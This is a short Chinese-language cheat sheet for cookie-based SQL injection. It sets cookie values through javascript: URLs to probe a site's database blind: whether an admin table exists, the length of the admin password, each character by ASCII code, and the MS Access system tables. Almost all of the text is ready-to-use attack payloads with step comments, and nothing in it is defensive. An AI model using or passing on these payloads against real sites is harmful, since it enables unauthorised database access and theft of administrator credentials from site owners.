前提是服务器读取cookies验证(有加密和数字签名的cookies很难修改了)
一。通过盗取 和修改cookies文件
二。通过命令行document.cookie
javascript:alert(document.cookie="id="+escape("156 and 1=1"));
javascript:alert(document.cookie="id="+escape("26 and (select count(*) from admin)>0"));
//猜是否有admin表
javascript:alert(document.cookie="id="+escape("26 and (select count(username) from admin)>0"));
//猜是否有username表
javascript:alert(document.cookie="id="+escape("40 and (select len(username) from admin)=5"));
//看管理员密码是否是5位
javascript:alert(document.cookie="id="+escape("26 and (select top 1 asc(mid(username,1,1)) from admin)=97"));
//第一位是否是ASC码97,相当于a
javascript:alert(document.cookie="targetID="+escape("108 and (select top 1 unicode(substring(user,3,1)) from admin)=111"));
javascript:alert(document.cookie="id="+escape("26 and (select top 1 asc(mid(username,2,1)) from admin)=97"));
//第二位
javascript:alert(document.cookie="targetID="+escape("108 and (select count(*) from msysobjects)>0"));
//看系统表